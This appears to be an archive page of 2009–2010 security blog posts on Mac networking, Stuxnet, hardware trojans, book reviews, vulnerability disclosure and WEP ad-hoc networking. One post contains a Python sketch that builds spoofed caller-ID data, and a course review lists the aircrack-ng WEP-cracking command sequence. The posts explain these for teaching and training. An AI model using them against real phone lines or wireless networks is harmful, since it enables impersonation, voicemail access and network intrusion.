New computers – Mac (nets)

One of my Mac fanatic contacts, when I mentioned that I needed to connect to my old Windows machines, said that it was easy: you just open “Networks,” and there they all are!  Well, no, not quite.  Not by a long shot, in fact.  I knew there was something called “Finder,” which is basically the interface to the filesystem on the Mac OS.  I even figured out where to find it, by going to the icon at the extreme left end of the top of the screen, and working out that choosing “Finder” under that option would change the top menu items from those of the browser that was active at the time.

So, I found Finder, and I even found the Network part of it.  And I asked it to search for servers.  It didn’t find any.  So I asked it to find a specific server.  It didn’t find that, either, but the fact that the name I had specified popped up with “afp:” at the beginning gave me an indication that I had to specify a protocol for Windows machines.  I went searching in the help files, and, eventually, found it.  Not too hard to figure out that it was “smb:” (at least, not too hard once you know it).  I was then able to figure out, on my own, that specifying the machine name with a leading “//” was wrong, because the Mac helpfully and intelligently adds “//” to whatever you type, but is too stupid to figure out that “////” is wrong.
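If you ever script the same connection, the fix is simply to strip any slashes the user typed before handing the address over.  A small Python sketch (the server and share names are made up):

```python
def smb_url(host, share=""):
    """Build a well-formed smb:// URL, stripping any leading slashes
    the user typed, since the dialog adds its own "//"."""
    host = host.lstrip("/")              # avoids the "smb:////server" mistake
    url = "smb://" + host
    if share:
        url += "/" + share.lstrip("/")
    return url

# Typing "//fileserver" or "fileserver" now gives the same result.
assert smb_url("//fileserver", "shared") == "smb://fileserver/shared"
assert smb_url("fileserver", "shared") == "smb://fileserver/shared"
```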


New computers – Mac (basics)

My father-in-law is a dedicated Apple fanatic (as are a number of my friends).  Since I had an MS-DOS machine when we first met, he tagged me as an IBM person.  (It was futile to point out that, although I had once installed a Baby 36 for a charity, I did not, in fact, have a System/360 installed in the non-existent basement of my apartment.)  He eventually figured out that Microsoft made the operating system, but, even though I have worked on (among others) a predecessor to AOS/VS, Apple DOS, UNIX, TOPS-10, VMS, JCL, and CP/M, and make no secret of my frustrations with Windows, he still considers me to be one of “the enemy.”

Well, I’ve always wanted to have a crack at Macs.  I got the first one installed in one company I worked for, over twenty years ago, used it for a while, and, despite the frustrations, was still interested in getting one of my own.  So, this year, while I had the need to update at least two machines, and since the price had come down from “completely-out-of-the-question” to merely “obscene,” I decided to get one.

The experience has been interesting.  I shall, no doubt, have more to say about aspects of operation in the future, but it has been an education to get a new Mac (a MacBook Pro laptop) and take it out of the box.

To give credit where credit is due, I’ve got to say that I’ve been impressed with the performance of the Mac and the Safari browser on the Web, which is what I’ve done with it so far.  The overall design is nice, of course.  I like the battery life (so far), and the “sleep” mode performance.  The machine recognized a generic mouse I plugged into it, and happily connected to the Internet through a wired LAN.  The minimal (well, OK, slightly more than minimal) experience I’ve had with Mac OS X was quite sufficient to get me started on the machine, and I’ve even managed to puzzle out some things with the help of the “Help” system (but more on that later).

The big thing with Mac advertising, and Mac devotees, is that the Mac is easy to use “right out of the box.”  And, yes, that is partially, and possibly even mostly, true.  But not completely.

The reason that I needed to plug in a mouse was that I could not figure out how to “choose” or activate something with the trackpad.  I could move the pointer around, no problem, but then there were no buttons to push.  Tapping didn’t work.  I remembered seeing people tapping hard on the trackpad on Mac laptops, so I tried that.  Sometimes it worked, and sometimes it didn’t.

Experienced Mac laptop users will be smirking, of course, knowing what I eventually found out.  You don’t tap the trackpad, or even tap it hard.  You press, deliberately, and you can actually feel a detent “click” when you’ve pressed hard enough.  (And, of course, whatever you wanted to activate gets activated.)  This is sort of implied in the documentation (when I found it), but even there it isn’t really made clear.  And it certainly isn’t “intuitively obvious.”

Ah, yes, the documentation.  Once you’ve figured out how to open up the box the laptop comes in, you take the laptop out of the clear cellophane “envelope,” and open it up.  Since it is shipped with the battery charged, as soon as you take the protective foam sheet off the keyboard, and figure out the power button (not *too* hard, if you’ve got good eyes: white on silver is pretty, but not exactly clear) things start happening.  Once you’ve gotten over the excitement, you may notice that there are power cords in a bay at the back of the box.  You are less likely to notice that there is a black cardboard envelope nestled into the black packing material at the front of the box.  Pulling on a tab in just the right way starts to loosen this, although you still seem to have to find a finger hole in the envelope in order to get it out, and then figure out how to open it.  Once you do, you will find a brief booklet which does tell you which of the two power cords is actually a power cord, and which is a mere (and very short) extension cord.  It also tells you a few other things that would have been handy, had I not already figured them out by trial and (mostly) error.  (There is also a CD or DVD which I haven’t yet had the time to try out.)

OK, some of the design is great.  (Not insanely, but great.)  Not all of it.


FBI Planted backdoors in OpenBSD IPSEC?

Not sure what to make of this yet:

“FBI Added Secret Backdoors to OpenBSD IPSEC”

Theo De Raadt seems to be ambiguous about this:

“It is alleged that some ex-developers (and the company they worked for) accepted US government money to put backdoors into our network stack, in particular the IPSEC stack.  Around 2000-2001.”

“I refuse to become part of such a conspiracy, and will not be talking to Gregory Perry about this.”


Who’s behind Stuxnet?

Stuxnet is a worm that focuses on attacking SCADA devices. This is interesting on several levels.

First, we get to see all of those so-called isolated networks get infected, and wonder how that happened (here’s a clue: in 2010, isolated means in a concrete box buried underground with no person having access to it).

Then, we get to see how weak SCADA devices really are. No surprise to anyone who has ever fuzzed one.

After that, we get to theorize on who’s behind it and who is the target. What’s your guess?


Reflections on Trusting Trust goes hardware

A recent Scientific American article points out that it is getting increasingly difficult to keep our Trusted Computing Base sufficiently small.

For further information on this scenario, see:  [1]

We actually discussed this in the early days of virus research, and sporadically since.  The random aspect (see the Dell problems with bad chips; the stories about malware on the boards are overblown, since the malware was simply stored in unused memory, rather than in the BIOS or other boot ROM) is definitely a problem, but a deliberate attack is problematic for the attacker.  The issue lies with the hundreds of thousands of hobbyists (as well as some of the hackers) who poke and prod at everything.  True, the chance of discovering the attack is random, but so is the chance of keeping the attack undetected.  It isn’t something that an attacker could rely upon.

Yes, these days there are thousands of components, being manufactured by hundreds of vendors.  However, note various factors that need to be considered.

First of all, somebody has to make it.  Most major chips, like CPUs, are a combined effort.  Nobody would be able to design and manufacture a major chip all by themselves.  And, in these days of tight margins and using every available scrap of chip “real estate,” someone would be bound to notice a section of the chip labeled “this space intentionally left blank.”  The more people who are involved, the more likely someone is going to spill the beans, at the very least about an anomaly on the chip, whether or not they knew what it did.  (Once the word is out that there is an anomaly, the lifespan of that secret is probably about three weeks.)

Secondly, there is the issue of the payload.  What can you make it do?  Remember, we are talking components, here.  This means that, in order to make it do anything, you are generally going to have to rely on whatever else is in the device or system in which your chip has been embedded.  You cannot assume that you will have access to communications, memory, disk space, or pretty much anything else, unless you are on the CPU.  Even if you are on the CPU, you are going to be limited.  Do you know what you are?  Are you a computer?  Smartphone?  iPod?  (If the last, you are out of luck, unless you want to try and drive the user slowly insane by refusing to play anything except Barry Manilow.)  If you are a computer, do you know what operating system you are running?  Do you know the format of any disk connected to you?  The more you have to know how to deal with, the more programming has to be built into you, and remember that real estate limitation.  Even if all you are going to do is shut down, you have to have access to communications, and you have to a) be able to see all the traffic, and b) actually watch all of it, without degrading performance while doing so.  (OK, true, it could just be a timer.  That doesn’t allow the attacker a lot of control.)

Next, you have to get people to use your chips.  That means that your chips have to be as cheap as, or cheaper than, the competition.  And remember, you have to use up chip real estate in order to have your payload on the chip.  That means that, for every 1% of chip space you use up for your programming, you lose 1% of manufacturing capacity.  So you have to have deep pockets to fund this.  Your chip also has to be at least as capable as the competition.  It also has to be as reliable as the competition.  You have to test that the payload you’ve put in place does not adversely affect performance, until you tell it to.  And you have to test it in a variety of situations and applications.  All the while making sure nobody finds out your little secret.
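That real-estate penalty compounds directly into unit cost.  A back-of-the-envelope sketch in Python, with invented numbers:

```python
def extra_cost_per_chip(base_cost, payload_fraction):
    """Simplistic model: if the payload eats payload_fraction of the
    die, you get proportionally fewer usable chips per wafer, so the
    per-chip cost rises by the same factor."""
    return base_cost / (1.0 - payload_fraction) - base_cost

# Invented numbers: 1% of die area for the payload on a $10 chip
# costs roughly ten cents extra on every chip you ship.
extra = extra_cost_per_chip(10.0, 0.01)
assert 0.10 < extra < 0.11
```

Ten cents sounds trivial until you multiply it across millions of units, all funded out of the attacker’s pocket.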

Next, you have to trigger your attack.  The trigger can’t be something that could just happen randomly.  And remember, traffic on the Internet, particularly with people streaming videos out there, can be pretty random.  Also remember that there are hundreds of thousands of kids out there with nothing better to do than try to use their computers, smartphones, music players, radio controlled cars, and blenders in exactly the way they aren’t supposed to.  And several thousand who, as soon as something odd happens, start trying to figure out why.

Bad hardware definitely is a threat.  But the largest part of that threat is simply the fact that cheap manufacturers are taking shortcuts and building unreliable components.  If I were an attacker, I would definitely be able to find easier ways to mess up the infrastructure than by trying to create attack chips.

[1] Get it some night when you can borrow it, for free, from your local library DVD collection.  On an evening when you don’t want to think too much.  Or at all.  WARNING: contains jokes that six year olds, and most guys, find funny.


Caller-ID spoof and voicemail

It’s easy to spoof caller-ID with some VoIP systems.  There are a few Websites that specifically allow it.  It’s a little harder, but geekier, to spoof or overflow caller-ID with a simple Bell 202 modem: the caller-ID data is transmitted with that tech between the first and second rings of the phone.  (Since most people have caller-ID these days, many telcos don’t play you the first ring.  Since we don’t have caller-ID, we often get accused of answering the phone before it rings.)  (Of course, the rings you hear on the calling side aren’t necessarily the rings heard on the other end, but …)
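For the curious, the burst between the rings is just a short byte stream: a message type, a length, some tagged parameters, and a checksum chosen so the whole message sums to zero modulo 256.  Here is a rough Python sketch of building such a message; the parameter codes are my recollection of the Bellcore multiple-data message format, and should be checked against the actual spec before trusting them:

```python
def mdmf_message(number, name, timestamp):
    """Sketch of a caller-ID payload in the (assumed) MDMF layout:
    0x80 message type, length, then type/length/data parameters.
    Assumed codes: 0x01 date/time ("MMDDHHMM"), 0x02 number, 0x07 name."""
    def param(code, data):
        return bytes([code, len(data)]) + data.encode("ascii")

    body = (param(0x01, timestamp)
            + param(0x02, number)
            + param(0x07, name))
    msg = bytes([0x80, len(body)]) + body
    checksum = (-sum(msg)) % 256        # whole message sums to 0 mod 256
    return msg + bytes([checksum])

m = mdmf_message("6045551234", "SLADE R", "12241030")
assert sum(m) % 256 == 0                # the receiver's integrity check
```

Feed those bytes to 1200 bps FSK modulation at the right moment and a box on the line will happily display whatever number you put in.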

Apparently AT&T allows immediate access to voicemail on the basis of caller-ID.

Apparently, with Android phones, it’s also gotten even easier to spoof caller-ID.


REVIEW: “SSL and TLS: Theory and Practice”, Rolf Oppliger

BKSSLTTP.RVW   20091129

“SSL and TLS: Theory and Practice”, Rolf Oppliger, 2009, 978-1-59693-447-4
%A   Rolf Oppliger
%C   685 Canton St., Norwood, MA   02062
%D   2009
%G   978-1-59693-447-4 1-59693-447-6
%I   Artech House/Horizon
%O   617-769-9750 800-225-9977
%O   Audience i+ Tech 3 Writing 2 (see revfaq.htm for explanation)
%P   257 p.
%T   “SSL and TLS: Theory and Practice”

The preface states that the book is intended to update the existing literature on SSL (Secure Sockets Layer) and TLS (Transport Layer Security), and to provide a design level understanding of the protocols.  (Oppliger does not address issues of implementation or specific products.)  The work assumes a basic understanding of TCP/IP, the Internet standards process, and cryptography, although some fundamental cryptographic principles are given.

Chapter one is a basic introduction to security and some related concepts.  The author uses the definition of security architecture from RFC 2828 to provide a useful starting point and analogy.  The five security services listed in ISO 7498-2 and X.800 (authentication, access control, confidentiality, integrity, and nonrepudiation) are clearly defined, and the resultant specific and pervasive security mechanisms are mentioned.  In chapter two, Oppliger gives a brief overview of a number of cryptologic terms and concepts, but some (such as steganography) may not be relevant to examination of the SSL and TLS protocols.  (There is also a slight conflict: in chapter one, a secure system is defined as one that is proof against a specific and defined threat, whereas, in chapter two, this is seen as conditional security.)  The author’s commentary is, as in all his works, clear and insightful, but the cryptographic theory provided does go well beyond what is required for this topic.

Chapter three, although entitled “Transport Layer Security,” is basically a history of both SSL and TLS.  SSL is examined in terms of the protocols, structures, and messages, in chapter four.  There is also a quick analysis of the structural strength of the specification.
Since TLS is derived from SSL, the material in chapter five concentrates on the differences between SSL 3.0 and TLS 1.0, and then looks at algorithmic options for TLS 1.1 and 1.2.  DTLS (Datagram Transport Layer Security), for UDP (User Datagram Protocol), is described briefly in chapter six, and seems to simply add sequence numbers to UDP, with some additional provision for security cookie exchanges.  Chapter seven notes the use of SSL for VPN (virtual private network) tunneling.  Chapter eight reviews some aspects of public key certificates, but provides little background for full implementation of PKI (Public Key Infrastructure).  As a finishing touch, chapter nine notes the sidejacking attacks, concerns about man-in-the-middle (MITM) attacks (quite germane, at the moment), and notes that we should move from certificate based PKI to a trust and privilege management infrastructure (PMI).

In relatively few pages, Oppliger has provided background, introduction, and technical details of the SSL and TLS variants you are likely to encounter.  The material is clear, well structured, and easily accessible.  He has definitely enhanced the literature, not only of TLS, but also of security in general.

copyright Robert M. Slade, 2009    BKSSLTTP.RVW   20091129


REVIEW: “Cloud Security and Privacy”, Tim Mather/Subra Kumaraswamy/Shahed Latif

BKCLSEPR.RVW   20091113

“Cloud Security and Privacy”, Tim Mather/Subra Kumaraswamy/Shahed Latif, 2009, 978-0-596-80276-9, U$34.99/C$43.99
%A   Tim Mather
%A   Subra Kumaraswamy
%A   Shahed Latif
%C   103 Morris Street, Suite A, Sebastopol, CA   95472
%D   2009
%G   978-0-596-80276-9 0-596-80276-5
%I   O’Reilly & Associates, Inc.
%O   U$34.99/C$43.99 800-998-9938 707-829-0515
%O   Audience i- Tech 1 Writing 1 (see revfaq.htm for explanation)
%P   312 p.
%T   “Cloud Security and Privacy”

The preface tells how the authors met, and that they were interested in writing a book on clouds and security.  It provides no definition of cloud computing.  (It also emphasizes an interest in being “first to market” with a work on this topic.)

Chapter one is supposed to be an introduction.  It is very brief, and, yet again, doesn’t say what a cloud is.  (The authors aren’t very careful about building background information: the acronym SPI is widely used and important to the book, but is used before it is defined.  It stands for SaaS/PaaS/IaaS, or software-as-a-service, platform-as-a-service, and infrastructure-as-a-service.  More simply, this refers to applications, management/development utilities, and storage.)  A delineation of cloud computing is finally given in chapter two, stating that it is characterized by multitenancy, scalability, elasticity, pay-as-you-go options, and self-provisioning.  (As these aspects are expanded, it becomes clear that the scalability, elasticity, and self-provisioning characteristics the authors describe are essentially the same thing: the ability of the user or client to manage the increase or decrease in services used.)  The fact that the authors do not define the term “cloud” becomes important as the guide starts to examine security considerations.  Interoperability is listed as a benefit of the cloud, whereas one of the risks is identified as vendor lock-in: these two factors are inherently mutually exclusive.

Chapter three talks about infrastructure security, but the advice seems to reduce to a recommendation to review the security of the individual components, including SaaS, PaaS, and network elements, which seems to ignore the emergent risks arising from any complex environment.  Encryption is said to be only a small part of data security in storage, as addressed in chapter four, but most of the material discusses encryption.  The deliberation on cryptography is superficial: the authors have managed to include the very recent research on homomorphic encryption, and note that the field will advance rapidly, but do not mention that homomorphic encryption is only useful for a very specific subset of data representations.  The identity management problem is outlined in chapter five, and protocols for managing new systems are reviewed, but the issue of integrating these protocols with existing systems is not.  “Security management in the Cloud,” as examined in chapter six, is a melange of general security management and operations management, with responsibility flipping back and forth between the customer and the provider.  Chapter seven provides a very good overview of privacy, but with almost no relation to the cloud as such.  Audit and compliance standards are described in chapter eight: only one is directed at the cloud.  Various cloud service providers (CSPs) are listed in chapter nine.  The terse description of security-as-a-service (confusingly also listed as SaaS), in chapter ten, is almost entirely restricted to spam and Web filtering.  The impact of the use of cloud technology is dealt with in chapter eleven.  It lists the pros and cons, but again, some of the points are presented without noting that they are mutually exclusive.  Chapter twelve finishes off the book with a precis of the foregoing chapters.

The authors do raise a wide variety of the security problems and concerns related to cloud computing.  However, since these are the same issues that need to be examined in any information security scenario, it is hard to say that any cloud-specific topics are addressed.  Stripped of excessive verbiage, the advice seems to reduce to a) know what you want, b) don’t make assumptions about what the provider provides, and c) audit the provider.

copyright Robert M. Slade, 2009    BKCLSEPR.RVW   20091113


Why Is Paid Responsible Disclosure So Damn Difficult?

So I’ve been sitting on an Apple vulnerability for over a month now, and I’m really starting to realise that maybe just sending the details to the Full-Disclosure mailing list is the right way to go about disclosing vulnerabilities and exploits.

I initially contacted ZDI to see if they would be at all interested in buying the exploit off of me, as I spent a lot of time researching and finding this one, and I’d like to get something for my efforts.  I am a firm believer in the No More Free Bugs movement, and I understand and appreciate what ZDI are doing, but, to be honest, the fact that it took them just under a month to get back to me is really not good enough.  If they don’t have the researchers, then advertise worldwide, instead of just in the US.  I, for one, would be happy validating bugs all day, and this is the type of work that can be done remotely.

Yesterday I also submitted the same information to the iDefense Labs Vulnerability Contributor Program (VCP), who claim they will get back to me within 48 hours, so we’ll see how that goes.  I will update this post as and when I know more.

I also took the off chance of mailing Apple directly, asking if they offer any rewards for vulnerabilities that have been found, and if so what they would be.  I don’t have high hopes of Apple offering anything, but, to be honest, I would prefer to disclose this one directly to Apple.  They, however, have paid staff doing this work full time on all their products, so why aren’t they finding these bugs themselves?  I feel that anyone else finding bugs for them should be compensated appropriately.  In any case, I e-mailed them yesterday and received an automated response, so we’ll see how long it takes them to respond to me as well.

This may end up being a rather long post, but let’s see. I’m also expecting to see quite a few interesting comments on this post as well, so come on people.

UPDATE 30/06/2010:

Received a response from iDefense last night, and a request for more info.  So just over a 24-hour response time, which is brilliant; I’m really impressed so far.

Received a response from Apple: if I would like any reward (aside from credit for the find), I was informed that I should go through ZDI or iDefense.



Like freedom of the press, ultimately, net neutrality is going to be reserved for those who own one.

Well, we’re getting closer.

Consider the case of cell/mobile phones.  The device is basically useless for communications, unless you have service through a provider.  They have the cell towers, and link through to the public telephone network.  You have to pay them, and they get to manage how calls are made.

(Just as a side issue, the more people who are subscribers in a given location, the worse chance you have of getting to make a call.  You get to be a victim of their [the telcos’] success.)

Now, consider.  Cell phones are getting smarter all the time.  Already they can connect with (and via) wifi.  And we can build applications for them.  Recently I didn’t have Internet access for my laptop, and someone with an Android phone was able to set up a wireless access point for me, through his phone, and give me that connection.

OK, let’s extend the routing a bit.  We’ve developed a lot of good routing protocols from building the Internet.  Let’s extend those to handle hops from phone to phone.  And, using voice over IP, and a few other technologies, pretty soon we can make calls without hitting a cell tower.
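Routing over phone-to-phone hops is, underneath, ordinary graph search.  A toy sketch in Python, finding the shortest chain of handsets that are in radio range of each other (the topology is invented):

```python
from collections import deque

def find_route(links, src, dst):
    """Breadth-first search for the shortest hop path from src to dst.
    links maps each phone to the phones currently in radio range."""
    paths = {src: [src]}
    queue = deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            return paths[node]
        for peer in links.get(node, ()):
            if peer not in paths:
                paths[peer] = paths[node] + [peer]
                queue.append(peer)
    return None   # no chain of phones connects the two

# Invented topology: A reaches D only by relaying through B and C.
links = {"A": ["B"], "B": ["A", "C"], "C": ["B", "D"], "D": ["C"]}
assert find_route(links, "A", "D") == ["A", "B", "C", "D"]
```

Real ad-hoc routing protocols have to cope with phones moving in and out of range, but the core idea is no more exotic than this.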

(And, bearing in mind technologies such as CDMA2000, note that, in opposition to the cell tower contention model, the *more* cell phones we put into an area under this model, the *better* our coverage and bandwidth is going to be.  The closer the devices are to each other, the faster [more bandwidth] they can talk to each other.)

Latency may be a problem.  Security (in terms of confidentiality) will definitely need to be addressed.  Long distance transmission will be a concern (although it’s rather amazing how many ideas start popping up as soon as those issues are raised).

Basically, any form of communication will follow from the same model.  With a bunch of cell phones where your only cost is the initial cost of the phone itself (no subscription, no usage cost, no long distance charges) it won’t take long for landline phones to be phased out.  Data communications, for any “store and forward” model (basically, anything other than streaming) will be even more efficient.  Maybe there will still be a place for the telcos: if you want faster service for real time streaming of content.  Of course, they’d have to be willing to set the price point for unlimited data low enough to be attractive …

However, we would now seem to be nearer the end than the beginning.  It’s mostly a matter of which platform to start with.  Google has demonstrated that it *can* turn off applications, but, in this case, why should it?  Apple might want to jump in on the ground floor, but they turn off a lot more apps, and, in any case, it probably isn’t best to start with a phone where you have to hold your tongue (or your hand) just right to get it to work.


National Strategy for Trusted Identities in Cyberspace

There is no possible way this could potentially go wrong, right?

Doesn’t the phrase “Identity Ecosystem” make you feel all warm and “green”?

It’s a public/private partnership, right?  So there is no possibility of some large corporation taking over the process and imposing *their* management ideas on it?  Like, say, trying to re-introduce the TCPI?

And there couldn’t possibly be any problem with an identity management system being run out of the US, which has no privacy legislation?

The fact that any PKI has to be complete, and locked down, couldn’t affect the outcome, could it?

There isn’t any possible need for anyone (who wasn’t a vile criminal) to be anonymous, is there?


OSWP – WiFu Training

Since the article I wrote a while ago about the OSCP training I did went down really well, I figured I’d write another article, this time about the Offensive Security WiFu course and the OSWP challenge.

As you probably remember, I loved the OSCP challenge; what could possibly be better than a “live hack” to pass an exam!

The WiFu course walks you through a lot of theory to start off with, and some may be very tempted to skip this section of the material; all I can say is: don’t.  You will gain a wealth of knowledge on the theory of wireless networking by going through this section.  I thought that I already knew quite a bit about wireless networking, and the security thereof, before I took this course, and, well, let’s just say that I didn’t.

The course mainly concentrates on how to use the aircrack-ng suite of tools, and it does this in a manner where you actually learn the best way to use each for its relevant purpose.  Some people may say, “Why not just read the help/man pages?”  Trust me, I read the help/man pages, and I was quite proficient with the aircrack-ng suite before I did the training; now not only am I confident, I also know exactly what I’m doing.
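For anyone who hasn’t seen it, the basic workflow the course drills goes: monitor mode, capture, replay to generate traffic, crack.  A sketch of that sequence as Python data (the interface name and BSSID are placeholders, and the exact flags should be checked against the aircrack-ng documentation rather than taken from me):

```python
def wep_attack_plan(iface, bssid, channel, capture="dump"):
    """Typical aircrack-ng WEP workflow as a list of argv commands.
    All names here (wlan0, the BSSID) are placeholders, and the
    monitor-interface name is an assumption about airmon-ng's output."""
    mon = iface + "mon"
    return [
        ["airmon-ng", "start", iface],                       # monitor mode
        ["airodump-ng", "-c", str(channel), "--bssid", bssid,
         "-w", capture, mon],                                # capture IVs
        ["aireplay-ng", "-3", "-b", bssid, mon],             # ARP replay for traffic
        ["aircrack-ng", capture + "-01.cap"],                # crack the capture
    ]

plan = wep_attack_plan("wlan0", "00:11:22:33:44:55", 6)
assert plan[0][0] == "airmon-ng" and plan[-1][0] == "aircrack-ng"
```

Knowing the sequence is the easy part; the course is about knowing why each step is there and what to do when one of them misbehaves.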

The price of the course is once again extremely reasonable: it comes in at a measly $350, which is honestly nothing for the knowledge that you will gain from doing the course and taking the challenge.  They also give you a list of recommended hardware for the course, and for me that in itself was worth it.  The wireless card I now possess is a lot better than my previous one, and the range really is phenomenal.

As for the challenge itself, it’s amazing: no bells and whistles, just cracking wireless APs in a safe environment, but it’s the stuff that you need to know if you’re planning on doing this in the real world at all.  You’re allowed 4 hours to complete the challenge, and this is more than enough time to make the odd mistake here and there.

I’ve read quite a bit on wireless security over the past year or so, and well, I could have saved myself a lot of time and effort by taking this course first. I know that I have easily spent over $350 on books alone on this topic.

If you’re at all currently involved in wireless networks and/or security and you’re thinking about doing some training, make it this course, as it will cover what you need to know.


KHOBE – the money link


In light of the KHOBE story, it seems a “darker” truth has been uncovered. Apparently the researchers have published their advisory in order to sell their research material to anyone who wants to know more than their limited technical details.

Why is this important? Well, it shows that when publishing their research, their intent was to:
1) Scare
2) Sell their software

While there might be legit reasons to check out their research, these new facts do bring the “KHOBE” paper into question, especially whether it is more noise than signal.

More details on the story can be seen here: KHOBE – no problem.

BTW, a bit of exaggeration by our colleague Aviram got him this week’s medal for PR scandal assistant.


The complexity of the ad-hoc network (and network research)

After months of intermittent attempts and research, I finally have a connection between two of my laptops, and an Internet connection to the one that is not physically connected to the wired LAN.

(Well, perhaps I might qualify that.  I appear to have a connection to the Internet, and I seem to have been successful at viewing a couple of Websites, and sending one piece of email.  It’s pig slow, and at the moment the mailer is trying to download some email.  It’s made enough of a connection to know that some email is there, but actually retrieving the email is taking enough time that I have been able to start to prep this posting in a browser window while I’m waiting.  I type very slowly, and, as of the end of this paragraph, it hasn’t yet successfully downloaded the second of seven messages.)

(The speed of the connection [although the computer says the connection is "Very Good"] may be due to the fact that I’m using WEP with a 104-bit, rather than 40-bit, key.  I don’t know how much difference it would make.  At the moment, having only just established the connection, I’m not about to mess with the settings to find out.)
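For reference, the only difference between the two is key length: WEP builds each packet’s RC4 key by concatenating a 24-bit IV with either a 40-bit or a 104-bit shared key.  A bare-bones Python sketch, leaving out the CRC-32 integrity value that real WEP appends:

```python
def rc4(key, data):
    """Plain RC4: key scheduling, then the keystream generator."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def wep_encrypt(iv, key, plaintext):
    """WEP's per-packet cipher: RC4 keyed with IV || key.  A 3-byte IV
    plus a 13-byte key is "104-bit" WEP; plus a 5-byte key, "40-bit"."""
    return rc4(iv + key, plaintext)

iv, key = b"\x01\x02\x03", b"thirteenbytes"   # 13 bytes = 104-bit WEP
ct = wep_encrypt(iv, key, b"hello")
assert wep_encrypt(iv, key, ct) == b"hello"   # RC4 is its own inverse
```

The per-packet work is the same either way, which is why the key size is an unlikely culprit for a slow link; the longer key only makes brute force harder, not each packet slower.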

However, as happy as I am to have the connection, the simple fact of it is not important enough to warrant a blog post.  No, the real point is all the trouble I encountered trying to find out how to make it work, following on from the complexity of any computing that I wrote about earlier.

As usual, I made my own life more difficult.  If all I wanted was a simple ad-hoc wireless network, that could be had for the asking.  Well, sort of.  A simple wireless network doesn’t do very much, unless you can share information from the drives, or share an Internet connection.  And that seems to be extra.

(Maybe.  At one point in the process, I had left one of the test wireless networks “on.”  And in one of my classes, one of my students managed to connect to it and get an Internet connection from the wired connection I had.  Random successes aren’t terribly useful, unless you can repeat them.)

Anyway, I have a wired network at home.  I have sharing enabled, so that I can copy materials from one machine to another.  At the moment, all of them run Windows XP.  (Yeah, I know.  I’ll get around to Linux sometime …)  I have (now) multiple laptops, and have to take at least one of them on the road for teaching.  And, of course, the mobile machines have to connect to all kinds of wired and wireless connections on the road.

Of course, the easy way would be to go to London Drugs and get a wireless router, connect it to the wired LAN, and fill in a few simple settings.  It’d probably take no more than a couple of hours, from beginning to end.  But I wouldn’t learn much about ad-hoc networking that way, and I’ve been getting more interested in it, particularly as a security concern, as I have been seeing that “computer-to-computer network” legend show up in more and more places.  (Especially with “Free Internet Connection!” as the network name.)

So, having a spare laptop (since, on a recent teaching trip, it decided to go spare on me), I figured it would be easy to set up a connection between that and the new one.

Actually, it was on the trip that I wanted to start the process.  There was nothing wrong with the old laptop (aside from being a Toshiba: I’ve had two Toshibas in a row, they’ve given me nothing but grief for eight years, and I will never again buy anything made by Toshiba) except that the power supply was becoming unreliable.  I bought a cheap (and non-Toshiba) netbook and asked for advice about connecting the two via an ad-hoc network in order to transfer the necessary files.

Well, I got lots of advice, but nothing actually worked, and I fell back on using the Passport external drive my wonderful daughters gave me, which has been so useful in so many situations.  But it doesn’t do networking.

My friends gave me some starting points in terms of places to look for advice.  Microsoft, naturally.  There is a wonderful Microsoft page which provides clear explanations.  Only a couple of problems: it was written in 2002, so the dialogue boxes have changed.  The piece does talk about sharing an Internet connection, but it doesn’t mention the need to modify the default IP addresses: everything seems to want to use the same private address range as a base, and that leads to conflicts.  Bottom line: it doesn’t work.

Microsoft updated the information in 2006, and the dialogue boxes in that version are closer to what you’ll actually see these days.  After running through it I tested it out, only to find that the network never does show up under “Available Wireless Networks.”  I’m not sure whether this is because, if you choose WEP and tell it not to broadcast the key, it keeps the network hidden.  I did manage to connect to the network, and even seemed to be able to see other computers’ drives, and see something of the Internet, but all of the connections disappeared over time.  Again, this page says to use Internet Connection Sharing, but doesn’t provide the detail necessary to make it work.

All kinds of pages are out there, if you do a Web search, seemingly based on this same, limited, misinformation.  One author seems to have given some thought to the issue of IP addresses, but not much.  Another goes into a bit more detail on the IP addresses, but not enough, particularly in terms of the entries that have to be made in various places on various machines.
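The IP address problem that these pages skate over can be illustrated in a few lines of Python.  (A sketch only: as I understand it, Internet Connection Sharing insists on the 192.168.0.x range, which is also what most home routers default to, so two DHCP servers end up fighting over the same addresses.  The alternative range below is an arbitrary example, not a recommendation.)

```python
import ipaddress

# ICS hands out addresses from 192.168.0.x (as I understand it), and a
# typical home router defaults to the very same private range.
ics_subnet = ipaddress.ip_network("192.168.0.0/24")     # ICS default range
router_subnet = ipaddress.ip_network("192.168.0.0/24")  # typical router default

# True: both sides are trying to manage the same addresses -- a conflict.
print(ics_subnet.overlaps(router_subnet))

# Moving one side to a different private range removes the conflict.
moved = ipaddress.ip_network("192.168.37.0/24")         # arbitrary example range
print(ics_subnet.overlaps(moved))                       # no overlap now
```

Which is all the Microsoft pages would have needed to say: if you are going to share a connection, one side of the network has to be re-addressed.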

Finding all the places to make those entries is a trip in and of itself.  The Help and Support Center for XP Home Edition is no help.  At one point I was afraid that the multitude of entries for the various networks I’ve connected to in hotels, airports, and seminar hosting sites had something to do with it, so I went and deleted all of those “Preferred networks” I had accumulated over the years.  (Did you know that they were all still there?)

Lots of people are willing, and more than willing, to provide the benefit of their lack of experience.  I say this since so many of the entries don’t actually work.  One is terse, and doesn’t work.  Another has slight technical detail, but doesn’t cover sharing a drive or an Internet connection, and doesn’t explain how to make the new wireless network visible to “View available wireless networks.”  One (5167281) has a touch more detail than the above and mentions the need to share the Internet connection, but also mentions a dialogue button that doesn’t exist in the XP version.  Three more give some detail on setting up the network, but none completely works, and none says anything about sharing (although the last does cover both XP and Vista).

Some of the advice is contradictory.  For example, I mentioned I was using WEP.  This is because some of the sites suggest that WPA and WPA2 can’t be used if the “host” for your ad-hoc network is running Windows XP (which mine is).  Of course, that might be old news, which might have been superseded by intervening upgrades.  But, with this level of information, how am I supposed to tell?

We are awash in a sea of information.  Except that some of the information is misinformative.  As John Lawton stated, the irony of the Information Age is that it has given new respectability to uninformed opinion.  This can have rather significant consequences.  A recent CBC story notes that this may have played into the May 6 stock market mini-meltdown.

